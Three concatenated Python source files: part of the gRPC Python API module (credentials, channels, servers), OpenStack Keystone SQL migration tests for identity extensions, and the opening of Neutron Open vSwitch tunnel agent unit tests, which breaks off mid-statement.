from grpc import _credential_composition
cygrpc_call_credentials = tuple(
single_call_credentials._credentials
for single_call_credentials in call_credentials)
return CallCredentials(
_credential_composition.call(cygrpc_call_credentials))
def composite_channel_credentials(channel_credentials, *call_credentials):
"""Compose a ChannelCredentials and one or more CallCredentials objects.
Args:
channel_credentials: A ChannelCredentials.
*call_credentials: One or more CallCredentials objects.
Returns:
A ChannelCredentials composed of the given ChannelCredentials and
CallCredentials objects.
"""
from grpc import _credential_composition
cygrpc_call_credentials = tuple(
single_call_credentials._credentials
for single_call_credentials in call_credentials)
return ChannelCredentials(
_credential_composition.channel(
channel_credentials._credentials, cygrpc_call_credentials))
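# A hedged sketch composing credentials with the helpers above; the two
# access tokens are hypothetical placeholders.
def _example_composed_credentials(channel_credentials, token_a, token_b):
    composed_call_credentials = composite_call_credentials(
        access_token_call_credentials(token_a),
        access_token_call_credentials(token_b))
    return composite_channel_credentials(
        channel_credentials, composed_call_credentials)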
def ssl_server_credentials(
private_key_certificate_chain_pairs, root_certificates=None,
require_client_auth=False):
"""Creates a ServerCredentials for use with an SSL-enabled Server.
Args:
private_key_certificate_chain_pairs: A nonempty sequence each element of
which is a pair the first element of which is a PEM-encoded private key
and the second element of which is the corresponding PEM-encoded
certificate chain.
root_certificates: PEM-encoded client root certificates to be used for
verifying authenticated clients. If omitted, require_client_auth must also
be omitted or be False.
require_client_auth: A boolean indicating whether or not to require clients
to be authenticated. May only be True if root_certificates is not None.
Returns:
A ServerCredentials for use with an SSL-enabled Server.
"""
if len(private_key_certificate_chain_pairs) == 0:
raise ValueError(
'At least one private key-certificate chain pair is required!')
elif require_client_auth and root_certificates is None:
raise ValueError(
'Illegal to require client auth without providing root certificates!')
else:
return ServerCredentials(
_cygrpc.server_credentials_ssl(
root_certificates,
[_cygrpc.SslPemKeyCertPair(key, pem)
for key, pem in private_key_certificate_chain_pairs],
require_client_auth))
def channel_ready_future(channel):
"""Creates a Future tracking when a Channel is ready.
Cancelling the returned Future does not tell the given Channel to abandon
attempts it may have been making to connect; cancelling merely deactivates the
returned Future's subscription to the given Channel's connectivity.
Args:
channel: A Channel.
Returns:
A Future that matures when the given Channel has connectivity
ChannelConnectivity.READY.
"""
from grpc import _utilities
return _utilities.channel_ready_future(channel)
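# A hedged usage sketch: block until the given channel is ready, giving up
# after ten seconds; the timeout value is a hypothetical choice.
def _example_wait_until_ready(channel):
    ready_future = channel_ready_future(channel)
    try:
        ready_future.result(timeout=10)
        print('channel is ready')
    except FutureTimeoutError:
        print('channel not ready within 10 seconds')
        ready_future.cancel()  # drop the connectivity subscription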
def insecure_channel(target, options=None):
"""Creates an insecure Channel to a server.
Args:
target: The target to which to connect.
options: A sequence of string-value pairs according to which to configure
the created channel.
Returns:
A Channel to the target through which RPCs may be conducted.
"""
from grpc import _channel
return _channel.Channel(target, options, None)
def secure_channel(target, credentials, options=None):
"""Creates a secure Channel to a server.
Args:
target: The target to which to connect.
credentials: A ChannelCredentials instance.
options: A sequence of string-value pairs according to which to configure
the created channel.
Returns:
A Channel to the target through which RPCs may be conducted.
"""
from grpc import _channel
return _channel.Channel(target, options, credentials._credentials)
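# A hedged sketch creating a secure channel from a PEM file on disk; the
# file path and target are hypothetical placeholders.
def _example_secure_channel():
    with open('roots.pem', 'rb') as f:
        root_certificates = f.read()
    credentials = ssl_channel_credentials(root_certificates=root_certificates)
    return secure_channel('example.com:443', credentials)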
def server(thread_pool, handlers=None):
"""Creates a Server with which RPCs can be serviced.
Args:
thread_pool: A futures.ThreadPoolExecutor to be used by the returned Server
to service RPCs.
handlers: An optional sequence of GenericRpcHandlers to be used to service
RPCs after the returned Server is started. These handlers need not be the
only handlers the server will use to service RPCs; other handlers may
later be added by calling add_generic_rpc_handlers any time before the
returned Server is started.
Returns:
A Server with which RPCs can be serviced.
"""
from grpc import _server
return _server.Server(thread_pool, () if handlers is None else handlers)
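# A hedged sketch assembling and starting a Server with the helpers above;
# the port and worker count are hypothetical choices.
def _example_server():
    from concurrent import futures
    rpc_server = server(futures.ThreadPoolExecutor(max_workers=10))
    rpc_server.add_insecure_port('[::]:50051')
    rpc_server.start()
    return rpc_server  # stop later with rpc_server.stop(grace=5)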
################################### __all__ #################################
__all__ = (
'FutureTimeoutError',
'FutureCancelledError',
'Future',
'ChannelConnectivity',
'StatusCode',
'RpcError',
'RpcContext',
'Call',
'ChannelCredentials',
'CallCredentials',
'AuthMetadataContext',
'AuthMetadataPluginCallback',
'AuthMetadataPlugin',
'ServerCredentials',
'UnaryUnaryMultiCallable',
'UnaryStreamMultiCallable',
'StreamUnaryMultiCallable',
'StreamStreamMultiCallable',
'Channel',
'ServicerContext',
'RpcMethodHandler',
'HandlerCallDetails',
'GenericRpcHandler',
'Server',
'unary_unary_rpc_method_handler',
'unary_stream_rpc_method_handler',
'stream_unary_rpc_method_handler',
'stream_stream_rpc_method_handler',
'method_handlers_generic_handler',
'ssl_channel_credentials',
'metadata_call_credentials',
'access_token_call_credentials',
'composite_call_credentials',
'composite_channel_credentials',
'ssl_server_credentials',
'channel_ready_future',
'insecure_channel',
'secure_channel',
'server',
)
| |
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
To run these tests against a live database:
1. Modify the file `keystone/tests/unit/config_files/backend_sql.conf` to use
the connection for your live database.
2. Set up a blank, live database.
3. Run the tests using::
tox -e py27 -- keystone.tests.unit.test_sql_migrate_extensions
WARNING::
Your database will be wiped.
Do not run this against a database with valuable data, as
all data will be lost.
"""
import sqlalchemy
import uuid
from oslo_db import exception as db_exception
from oslo_db.sqlalchemy import utils
from keystone.contrib import endpoint_filter
from keystone.contrib import endpoint_policy
from keystone.contrib import example
from keystone.contrib import federation
from keystone.contrib import oauth1
from keystone.contrib import revoke
from keystone.tests.unit import test_sql_upgrade
class SqlUpgradeExampleExtension(test_sql_upgrade.SqlMigrateBase):
def repo_package(self):
return example
def test_upgrade(self):
self.assertTableDoesNotExist('example')
self.upgrade(1, repository=self.repo_path)
self.assertTableColumns('example', ['id', 'type', 'extra'])
class SqlUpgradeOAuth1Extension(test_sql_upgrade.SqlMigrateBase):
def repo_package(self):
return oauth1
def upgrade(self, version):
super(SqlUpgradeOAuth1Extension, self).upgrade(
version, repository=self.repo_path)
def _assert_v1_3_tables(self):
self.assertTableColumns('consumer',
['id',
'description',
'secret',
'extra'])
self.assertTableColumns('request_token',
['id',
'request_secret',
'verifier',
'authorizing_user_id',
'requested_project_id',
'requested_roles',
'consumer_id',
'expires_at'])
self.assertTableColumns('access_token',
['id',
'access_secret',
'authorizing_user_id',
'project_id',
'requested_roles',
'consumer_id',
'expires_at'])
def _assert_v4_later_tables(self):
self.assertTableColumns('consumer',
['id',
'description',
'secret',
'extra'])
self.assertTableColumns('request_token',
['id',
'request_secret',
'verifier',
'authorizing_user_id',
'requested_project_id',
'role_ids',
'consumer_id',
'expires_at'])
self.assertTableColumns('access_token',
['id',
'access_secret',
'authorizing_user_id',
'project_id',
'role_ids',
'consumer_id',
'expires_at'])
def test_upgrade(self):
self.assertTableDoesNotExist('consumer')
self.assertTableDoesNotExist('request_token')
self.assertTableDoesNotExist('access_token')
self.upgrade(1)
self._assert_v1_3_tables()
# NOTE(blk-u): Migrations 2-3 don't modify the tables in a way that we
# can easily test for.
self.upgrade(4)
self._assert_v4_later_tables()
self.upgrade(5)
self._assert_v4_later_tables()
class EndpointFilterExtension(test_sql_upgrade.SqlMigrateBase):
def repo_package(self):
return endpoint_filter
def upgrade(self, version):
super(EndpointFilterExtension, self).upgrade(
version, repository=self.repo_path)
def _assert_v1_tables(self):
self.assertTableColumns('project_endpoint',
['endpoint_id', 'project_id'])
self.assertTableDoesNotExist('endpoint_group')
self.assertTableDoesNotExist('project_endpoint_group')
def _assert_v2_tables(self):
self.assertTableColumns('project_endpoint',
['endpoint_id', 'project_id'])
self.assertTableColumns('endpoint_group',
['id', 'name', 'description', 'filters'])
self.assertTableColumns('project_endpoint_group',
['endpoint_group_id', 'project_id'])
def test_upgrade(self):
self.assertTableDoesNotExist('project_endpoint')
self.upgrade(1)
self._assert_v1_tables()
self.assertTableColumns('project_endpoint',
['endpoint_id', 'project_id'])
self.upgrade(2)
self._assert_v2_tables()
class EndpointPolicyExtension(test_sql_upgrade.SqlMigrateBase):
def repo_package(self):
return endpoint_policy
def test_upgrade(self):
self.assertTableDoesNotExist('policy_association')
self.upgrade(1, repository=self.repo_path)
self.assertTableColumns('policy_association',
['id', 'policy_id', 'endpoint_id',
'service_id', 'region_id'])
class FederationExtension(test_sql_upgrade.SqlMigrateBase):
"""Test class for ensuring the Federation SQL."""
def setUp(self):
super(FederationExtension, self).setUp()
self.identity_provider = 'identity_provider'
self.federation_protocol = 'federation_protocol'
self.service_provider = 'service_provider'
self.mapping = 'mapping'
def repo_package(self):
return federation
def insert_dict(self, session, table_name, d):
"""Naively inserts key-value pairs into a table, given a dictionary."""
table = sqlalchemy.Table(table_name, self.metadata, autoload=True)
insert = table.insert().values(**d)
session.execute(insert)
session.commit()
def test_upgrade(self):
self.assertTableDoesNotExist(self.identity_provider)
self.assertTableDoesNotExist(self.federation_protocol)
self.assertTableDoesNotExist(self.mapping)
self.upgrade(1, repository=self.repo_path)
self.assertTableColumns(self.identity_provider,
['id',
'enabled',
'description'])
self.assertTableColumns(self.federation_protocol,
['id',
'idp_id',
'mapping_id'])
self.upgrade(2, repository=self.repo_path)
self.assertTableColumns(self.mapping,
['id', 'rules'])
federation_protocol = utils.get_table(
self.engine,
'federation_protocol')
with self.engine.begin() as conn:
conn.execute(federation_protocol.insert(), id=0, idp_id=1)
self.upgrade(3, repository=self.repo_path)
federation_protocol = utils.get_table(
self.engine,
'federation_protocol')
self.assertFalse(federation_protocol.c.mapping_id.nullable)
def test_service_provider_attributes_cannot_be_null(self):
self.upgrade(6, repository=self.repo_path)
self.assertTableColumns(self.service_provider,
['id', 'description', 'enabled', 'auth_url',
'sp_url'])
session = self.Session()
sp1 = {'id': uuid.uuid4().hex,
'auth_url': None,
'sp_url': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True}
sp2 = {'id': uuid.uuid4().hex,
'auth_url': uuid.uuid4().hex,
'sp_url': None,
'description': uuid.uuid4().hex,
'enabled': True}
sp3 = {'id': uuid.uuid4().hex,
'auth_url': None,
'sp_url': None,
'description': uuid.uuid4().hex,
'enabled': True}
# Insert with 'auth_url' or 'sp_url' set to null must fail
self.assertRaises(db_exception.DBError,
self.insert_dict,
session,
self.service_provider,
sp1)
self.assertRaises(db_exception.DBError,
self.insert_dict,
session,
self.service_provider,
sp2)
self.assertRaises(db_exception.DBError,
self.insert_dict,
session,
self.service_provider,
sp3)
session.close()
def test_fixup_service_provider_attributes(self):
session = self.Session()
sp1 = {'id': uuid.uuid4().hex,
'auth_url': None,
'sp_url': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True}
sp2 = {'id': uuid.uuid4().hex,
'auth_url': uuid.uuid4().hex,
'sp_url': None,
'description': uuid.uuid4().hex,
'enabled': True}
sp3 = {'id': uuid.uuid4().hex,
'auth_url': None,
'sp_url': None,
'description': uuid.uuid4().hex,
'enabled': True}
self.upgrade(5, repository=self.repo_path)
self.assertTableColumns(self.service_provider,
['id', 'description', 'enabled', 'auth_url',
'sp_url'])
# Before the migration, the table should accept null values
self.insert_dict(session, self.service_provider, sp1)
self.insert_dict(session, self.service_provider, sp2)
self.insert_dict(session, self.service_provider, sp3)
# Check if null values are updated to empty string when migrating
session.close()
self.upgrade(6, repository=self.repo_path)
sp_table = sqlalchemy.Table(self.service_provider,
self.metadata,
autoload=True)
session = self.Session()
self.metadata.clear()
sp = session.query(sp_table).filter(sp_table.c.id == sp1['id'])[0]
self.assertEqual('', sp.auth_url)
sp = session.query(sp_table).filter(sp_table.c.id == sp2['id'])[0]
self.assertEqual('', sp.sp_url)
sp = session.query(sp_table).filter(sp_table.c.id == sp3['id'])[0]
self.assertEqual('', sp.auth_url)
self.assertEqual('', sp.sp_url)
def test_add_relay_state_column(self):
self.upgrade(8, repository=self.repo_path)
self.assertTableColumns(self.service_provider,
['id', 'description', 'enabled', 'auth_url',
'relay_state_prefix', 'sp_url'])
class RevokeExtension(test_sql_upgrade.SqlMigrateBase):
_REVOKE_COLUMN_NAMES = ['id', 'domain_id', 'project_id', 'user_id',
'role_id', 'trust_id', 'consumer_id',
'access_token_id', 'issued_before', 'expires_at',
'revoked_at']
def repo_package(self):
return revoke
def test_upgrade(self):
self.assertTableDoesNotExist('revocation_event')
self.upgrade(1, repository=self.repo_path)
self.assertTableColumns('revocation_event',
self._REVOKE_COLUMN_NAMES)
| |
# Copyright 2012 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import time
import mock
from oslo_config import cfg
from oslo_log import log
from neutron.agent.common import ovs_lib
from neutron.agent.linux import ip_lib
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2.drivers.openvswitch.agent.common import constants
from neutron.tests.unit.plugins.ml2.drivers.openvswitch.agent \
import ovs_test_base
# Useful global dummy variables.
NET_UUID = '3faeebfe-5d37-11e1-a64b-000c29d5f0a7'
LS_ID = 420
LV_ID = 42
LV_IDS = [42, 43]
VIF_ID = '404deaec-5d37-11e1-a64b-000c29d5f0a8'
VIF_MAC = '3c:09:24:1e:78:23'
OFPORT_NUM = 1
VIF_PORT = ovs_lib.VifPort('port', OFPORT_NUM,
VIF_ID, VIF_MAC, 'switch')
VIF_PORTS = {VIF_ID: VIF_PORT}
FIXED_IPS = [{'subnet_id': 'my-subnet-uuid',
'ip_address': '1.1.1.1'}]
VM_DEVICE_OWNER = "compute:None"
TUN_OFPORTS = {p_const.TYPE_GRE: {'ip1': '11', 'ip2': '12'}}
BCAST_MAC = "01:00:00:00:00:00/01:00:00:00:00:00"
UCAST_MAC = "00:00:00:00:00:00/01:00:00:00:00:00"
class DummyPort(object):
def __init__(self, interface_id):
self.interface_id = interface_id
class DummyVlanBinding(object):
def __init__(self, network_id, vlan_id):
self.network_id = network_id
self.vlan_id = vlan_id
class TunnelTest(object):
USE_VETH_INTERCONNECTION = False
VETH_MTU = None
def setUp(self):
super(TunnelTest, self).setUp()
cfg.CONF.set_default('firewall_driver',
'neutron.agent.firewall.NoopFirewallDriver',
group='SECURITYGROUP')
cfg.CONF.set_override('report_interval', 0, 'AGENT')
self.INT_BRIDGE = 'integration_bridge'
self.TUN_BRIDGE = 'tunnel_bridge'
self.MAP_TUN_BRIDGE = 'tun_br_map'
self.NET_MAPPING = {'net1': self.MAP_TUN_BRIDGE}
self.INT_OFPORT = 11111
self.TUN_OFPORT = 22222
self.MAP_TUN_INT_OFPORT = 33333
self.MAP_TUN_PHY_OFPORT = 44444
self.LVM = self.mod_agent.LocalVLANMapping(
LV_ID, 'gre', None, LS_ID, VIF_PORTS)
self.LVM_FLAT = self.mod_agent.LocalVLANMapping(
LV_ID, 'flat', 'net1', LS_ID, VIF_PORTS)
self.LVM_VLAN = self.mod_agent.LocalVLANMapping(
LV_ID, 'vlan', 'net1', LS_ID, VIF_PORTS)
self.inta = mock.Mock()
self.intb = mock.Mock()
self.ovs_bridges = {
self.INT_BRIDGE: mock.create_autospec(
self.br_int_cls('br-int')),
self.TUN_BRIDGE: mock.create_autospec(
self.br_tun_cls('br-tun')),
self.MAP_TUN_BRIDGE: mock.create_autospec(
self.br_phys_cls('br-phys')),
}
self.ovs_int_ofports = {
'patch-tun': self.TUN_OFPORT,
'int-%s' % self.MAP_TUN_BRIDGE: self.MAP_TUN_INT_OFPORT
}
def lookup_br(br_name, *args, **kwargs):
return self.ovs_bridges[br_name]
self.mock_int_bridge_cls = mock.patch(self._BR_INT_CLASS,
autospec=True).start()
self.mock_int_bridge_cls.side_effect = lookup_br
self.mock_phys_bridge_cls = mock.patch(self._BR_PHYS_CLASS,
autospec=True).start()
self.mock_phys_bridge_cls.side_effect = lookup_br
self.mock_tun_bridge_cls = mock.patch(self._BR_TUN_CLASS,
autospec=True).start()
self.mock_tun_bridge_cls.side_effect = lookup_br
self.mock_int_bridge = self.ovs_bridges[self.INT_BRIDGE]
self.mock_int_bridge.add_port.return_value = self.MAP_TUN_INT_OFPORT
self.mock_int_bridge.add_patch_port.side_effect = (
lambda tap, peer: self.ovs_int_ofports[tap])
self.mock_int_bridge.get_vif_ports.return_value = []
self.mock_int_bridge.db_list.return_value = []
self.mock_int_bridge.db_get_val.return_value = {}
self.mock_map_tun_bridge = self.ovs_bridges[self.MAP_TUN_BRIDGE]
self.mock_map_tun_bridge.br_name = self.MAP_TUN_BRIDGE
self.mock_map_tun_bridge.add_port.return_value = (
self.MAP_TUN_PHY_OFPORT)
self.mock_map_tun_bridge.add_patch_port.return_value = (
self.MAP_TUN_PHY_OFPORT)
self.mock_tun_bridge = self.ovs_bridges[self.TUN_BRIDGE]
self.mock_tun_bridge.add_port.return_value = self.INT_OFPORT
self.mock_tun_bridge.add_patch_port.return_value = self.INT_OFPORT
self.device_exists = mock.patch.object(ip_lib, 'device_exists').start()
self.device_exists.return_value = True
self.ipdevice = mock.patch.object(ip_lib, 'IPDevice').start()
self.ipwrapper = mock.patch.object(ip_lib, 'IPWrapper').start()
add_veth = self.ipwrapper.return_value.add_veth
add_veth.return_value = [self.inta, self.intb]
self.get_bridges = mock.patch.object(ovs_lib.BaseOVS,
'get_bridges').start()
self.get_bridges.return_value = [self.INT_BRIDGE,
self.TUN_BRIDGE,
self.MAP_TUN_BRIDGE]
self.execute = mock.patch('neutron.agent.common.utils.execute').start()
self._define_expected_calls()
def _define_expected_calls(self, arp_responder=False):
self.mock_int_bridge_cls_expected = [
mock.call(self.INT_BRIDGE),
]
self.mock_phys_bridge_cls_expected = [
mock.call(self.MAP_TUN_BRIDGE),
]
self.mock_tun_bridge_cls_expected = [
mock.call(self.TUN_BRIDGE),
]
self.mock_int_bridge = self.ovs_bridges[self.INT_BRIDGE]
self.mock_int_bridge_expected = [
mock.call.create(),
mock.call.set_secure_mode(),
mock.call.setup_controllers(mock.ANY),
mock.call.delete_port('patch-tun'),
mock.call.setup_default_table(),
]
self.mock_map_tun_bridge_expected = [
mock.call.setup_controllers(mock.ANY),
mock.call.setup_default_table(),
mock.call.delete_port('phy-%s' % self.MAP_TUN_BRIDGE),
mock.call.add_patch_port('phy-%s' % self.MAP_TUN_BRIDGE,
constants.NONEXISTENT_PEER), ]
self.mock_int_bridge_expected += [
mock.call.delete_port('int-%s' % self.MAP_TUN_BRIDGE),
mock.call.add_patch_port('int-%s' % self.MAP_TUN_BRIDGE,
constants.NONEXISTENT_PEER),
]
self.mock_int_bridge_expected += [
mock.call.drop_port(in_port=self.MAP_TUN_INT_OFPORT),
mock.call.set_db_attribute(
'Interface', 'int-%s' % self.MAP_TUN_BRIDGE,
'options:peer', 'phy-%s' % self.MAP_TUN_BRIDGE),
]
self.mock_map_tun_bridge_expected += [
mock.call.drop_port(in_port=self.MAP_TUN_PHY_OFPORT),
mock.call.set_db_attribute(
'Interface', 'phy-%s' % self.MAP_TUN_BRIDGE,
'options:peer', 'int-%s' % self.MAP_TUN_BRIDGE),
]
self.mock_tun_bridge_expected = [
mock.call.reset_bridge(secure_mode=True),
mock.call.setup_controllers(mock.ANY),
mock.call.add_patch_port('patch-int', 'patch-tun'),
]
self.mock_int_bridge_expected += [
mock.call.add_patch_port('patch-tun', 'patch-int'),
]
self.mock_int_bridge_expected += [
mock.call.get_vif_ports(),
mock.call.db_list('Port', columns=['name', 'other_config', 'tag'])
]
self.mock_tun_bridge_expected += [
mock.call.delete_flows(),
mock.call.setup_default_table(self.INT_OFPORT, arp_responder),
]
self.device_exists_expected = []
self.ipdevice_expected = []
self.ipwrapper_expected = [mock.call()]
self.get_bridges_expected = [mock.call(), mock.call()]
self.inta_expected = []
self.intb_expected = []
self.execute_expected = []
def _build_agent(self, **kwargs):
bridge_classes = {
'br_int': self.mock_int_bridge_cls,
'br_phys': self.mock_phys_bridge_cls,
'br_tun': self.mock_tun_bridge_cls,
}
kwargs.setdefault('bridge_classes', bridge_classes)
kwargs.setdefault('integ_br', self.INT_BRIDGE)
kwargs.setdefault('tun_br', self.TUN_BRIDGE)
kwargs.setdefault('local_ip', '10.0.0.1')
kwargs.setdefault('bridge_mappings', self.NET_MAPPING)
kwargs.setdefault('polling_interval', 2)
kwargs.setdefault('tunnel_types', ['gre'])
kwargs.setdefault('veth_mtu', self.VETH_MTU)
kwargs.setdefault('use_veth_interconnection',
self.USE_VETH_INTERCONNECTION)
return self.mod_agent.OVSNeutronAgent(**kwargs)
def _verify_mock_call(self, mock_obj, expected):
mock_obj.assert_has_calls(expected)
self.assertEqual(expected, mock_obj.mock_calls)
def _verify_mock_calls(self):
self._verify_mock_call(self.mock_int_bridge_cls,
self.mock_int_bridge_cls_expected)
self._verify_mock_call(self.mock_tun_bridge_cls,
self.mock_tun_bridge_cls_expected)
self._verify_mock_call(self.mock_phys_bridge_cls,
self.mock_phys_bridge_cls_expected)
self._verify_mock_call(self.mock_int_bridge,
self.mock_int_bridge_expected)
self._verify_mock_call(self.mock_map_tun_bridge,
self.mock_map_tun_bridge_expected)
self._verify_mock_call(self.mock_tun_bridge,
self.mock_tun_bridge_expected)
self._verify_mock_call(self.device_exists, self.device_exists_expected)
self._verify_mock_call(self.ipdevice, self.ipdevice_expected)
self._verify_mock_call(self.ipwrapper, self.ipwrapper_expected)
self._verify_mock_call(self.get_bridges, self.get_bridges_expected)
self._verify_mock_call(self.inta, self.inta_expected)
self._verify_mock_call(self.intb, self.intb_expected)
self._verify_mock_call(self.execute, self.execute_expected)
def test_construct(self):
agent = self._build_agent()
self.assertEqual(agent.agent_id, 'ovs-agent-%s' % cfg.CONF.host)
self._verify_mock_calls()
# TODO(ethuleau): Initially, the local ARP responder is dependent on the
# ML2 l2 population mechanism driver.
# The next two tests use l2_pop flag to test ARP responder
def test_construct_with_arp_responder(self):
self._build_agent(l2_population=True, arp_responder=True)
self._define_expected_calls(True)
self._verify_mock_calls()
def test_construct_without_arp_responder(self):
self._build_agent(l2_population=False, arp_responder=True)
self._verify_mock_calls()
def test_construct_vxlan(self):
self._build_agent(tunnel_types=['vxlan'])
self._verify_mock_calls()
def test_provision_local_vlan(self):
ofports = TUN_OFPORTS[p_const.TYPE_GRE].values()
self.mock_tun_bridge_expected += [
mock.call.install_flood_to_tun(LV_ID, LS_ID, ofports),
mock.call.provision_local_vlan(
network_type=p_const.TYPE_GRE,
lvid=LV_ID,
segmentation_id=LS_ID),
]
a = self._build_agent()
a.available_local_vlans = set([LV_ID])
a.tun_br_ofports = TUN_OFPORTS
a.provision_local_vlan(NET_UUID, p_const.TYPE_GRE, None, LS_ID)
self._verify_mock_calls()
def test_provision_local_vlan_flat(self):
self.mock_map_tun_bridge_expected.append(
mock.call.provision_local_vlan(
port=self.MAP_TUN_PHY_OFPORT,
lvid=LV_ID,
segmentation_id=None,
distributed=False))
self.mock_int_bridge_expected.append(
mock.call.provision_local_vlan(
port=self.INT_OFPORT,
lvid=LV_ID,
segmentation_id=None))
a = self._build_agent()
a.available_local_vlans = set([LV_ID])
a.phys_brs['net1'] = self.mock_map_tun_bridge
a.phys_ofports['net1'] = self.MAP_TUN_PHY_OFPORT
a.int_ofports['net1'] = self.INT_OFPORT
a.provision_local_vlan(NET_UUID, p_const.TYPE_FLAT, 'net1', LS_ID)
self._verify_mock_calls()
def test_provision_local_vlan_flat_fail(self):
a = self._build_agent()
a.provision_local_vlan(NET_UUID, p_const.TYPE_FLAT, 'net2', LS_ID)
self._verify_mock_calls()
def test_provision_local_vlan_vlan(self):
self.mock_map_tun_bridge_expected.append(
mock.call.provision_local_vlan(
port=self.MAP_TUN_PHY_OFPORT,
lvid=LV_ID,
segmentation_id=LS_ID,
distributed=False))
self.mock_int_bridge_expected.append(
mock.call.provision_local_vlan(
port=self.INT_OFPORT,
lvid=LV_ID,
segmentation_id=LS_ID))
a = self._build_agent()
a.available_local_vlans = set([LV_ID])
a.phys_brs['net1'] = self.mock_map_tun_bridge
a.phys_ofports['net1'] = self.MAP_TUN_PHY_OFPORT
a.int_ofports['net1'] = self.INT_OFPORT
a.provision_local_vlan(NET_UUID, p_const.TYPE_VLAN, 'net1', LS_ID)
self._verify_mock_calls()
def test_provision_local_vlan_vlan_fail(self):
a = self._build_agent()
a.provision_local_vlan(NET_UUID, p_const.TYPE_VLAN, 'net2', LS_ID)
self._verify_mock_calls()
def test_reclaim_local_vlan(self):
self.mock_tun_bridge_expected += [
mock.call.reclaim_local_vlan(network_type='gre',
segmentation_id=LS_ID),
mock.call.delete_flood_to_tun(LV_ID),
mock.call.delete_unicast_to_tun(LV_ID, None),
mock.call.delete_arp_responder(LV_ID, None),
]
a = self._build_agent()
a.available_local_vlans = set()
a.local_vlan_map[NET_UUID] = self.LVM
a.reclaim_local_vlan(NET_UUID)
self.assertIn(self.LVM.vlan, a.available_local_vlans)
self._verify_mock_calls()
def test_reclaim_local_vlan_flat(self):
self.mock_map_tun_bridge_expected.append(
mock.call.reclaim_local_vlan(
port=self.MAP_TUN_PHY_OFPORT,
lvid=self.LVM_FLAT.vlan))
self.mock_int_bridge_expected.append(
mock.call.reclaim_local_vlan(
port=self.INT_OFPORT,
segmentation_id=None))
a = self._build_agent()
a.phys_brs['net1'] = self.mock_map_tun_bridge
a.phys_ofports['net1'] = self.MAP_TUN_PHY_OFPORT
a.int_ofports['net1'] = self.INT_OFPORT
a.available_local_vlans = set()
a.local_vlan_map[NET_UUID] = self.LVM_FLAT
a.reclaim_local_vlan(NET_UUID)
self.assertIn(self.LVM_FLAT.vlan, a.available_local_vlans)
self._verify_mock_calls()
def test_reclaim_local_vlan_vlan(self):
self.mock_map_tun_bridge_expected.append(
mock.call.reclaim_local_vlan(
port=self.MAP_TUN_PHY_OFPORT,
lvid=self.LVM_VLAN.vlan))
self.mock_int_bridge_expected.append(
mock.call.reclaim_local_vlan(
port=self.INT_OFPORT,
segmentation_id=LS_ID))
a = self._build_agent()
a.phys_brs['net1'] = self.mock_map_tun_bridge
a.phys_ofports['net1'] = self.MAP_TUN_PHY_OFPORT
a.int_ofports['net1'] = self.INT_OFPORT
a.available_local_vlans = set()
a.local_vlan_map[NET_UUID] = self.LVM_VLAN
a.reclaim_local_vlan(NET_UUID)
self.assertIn(self.LVM_VLAN.vlan, a.available_local_vlans)
self._verify_mock_calls()
def test_port_bound(self):
vlan_mapping = {'segmentation_id': LS_ID,
'physical_network': None,
'net_uuid': NET_UUID,
'network_type': 'gre'}
self.mock_int_bridge_expected += [
mock.call.db_get_val('Port', 'port', 'other_config'),
mock.call.set_db_attribute('Port', VIF_PORT.port_name,
'other_config',
vlan_mapping)]
a = self._build_agent()
a.local_vlan_map[NET_UUID] = self.LVM
a.local_dvr_map = {}
self.ovs_bridges[self.INT_BRIDGE].db_get_val.return_value = {}
a.port_bound(VIF_PORT, NET_UUID, 'gre', None, LS_ID,
FIXED_IPS, VM_DEVICE_OWNER, False)
self._verify_mock_calls()
def test_port_unbound(self):
with mock.patch.object(self.mod_agent.OVSNeutronAgent,
'reclaim_local_vlan') as reclaim_local_vlan:
a = self._build_agent()
a.local_vlan_map[NET_UUID] = self.LVM
a.port_unbound(VIF_ID, NET_UUID)
reclaim_local_vlan.assert_called_once_with(NET_UUID)
self._verify_mock_calls()
def test_port_dead(self):
self.mock_int_bridge_expected += [
mock.call.db_get_val('Port', VIF_PORT.port_name, 'tag',
log_errors=True),
mock.call.set_db_attribute(
'Port', VIF_PORT.port_name,
'tag', self.mod_agent.DEAD_VLAN_TAG,
log_errors=True),
mock.call.drop_port(in_port=VIF_PORT.ofport),
]
a = self._build_agent()
a.available_local_vlans = set([LV_ID])
a.local_vlan_map[NET_UUID] = self.LVM
self.ovs_bridges[self.INT_BRIDGE].db_get_val.return_value = mock.Mock()
a.port_dead(VIF_PORT)
self._verify_mock_calls()
def test_tunnel_update(self):
tunnel_port = '9999'
self.mock_tun_bridge.add_tunnel_port.return_value = tunnel_port
self.mock_tun_bridge_expected += [
mock.call.add_tunnel_port('gre-0a000a01', '10.0.10.1', '10.0.0.1',
'gre', 4789, True),
mock.call.setup_tunnel_port('gre', tunnel_port),
]
a = self._build_agent()
a.tunnel_update(
mock.sentinel.ctx, tunnel_ip='10.0.10.1',
tunnel_type=p_const.TYPE_GRE)
self._verify_mock_calls()
def test_tunnel_update_self(self):
a = self._build_agent()
a.tunnel_update(
mock.sentinel.ctx, tunnel_ip='10.0.0.1')
self._verify_mock_calls()
def test_daemon_loop(self):
reply2 = {'current': set(['tap0']),
'added': set(['tap2']),
'removed': set([])}
reply3 = {'current': set(['tap2']),
'added': set([]),
'removed': set(['tap0'])}
self.mock_int_bridge_expected += [
mock.call.check_canary_table(),
mock.call.check_canary_table()
]
self.ovs_bridges[self.INT_BRIDGE].check_canary_table.return_value = \
constants.OVS_NORMAL
with mock.patch.object(log.KeywordArgumentAdapter,
'exception') as log_exception,\
mock.patch.object(self.mod_agent.OVSNeutronAgent,
'scan_ports') as scan_ports,\
mock.patch.object(
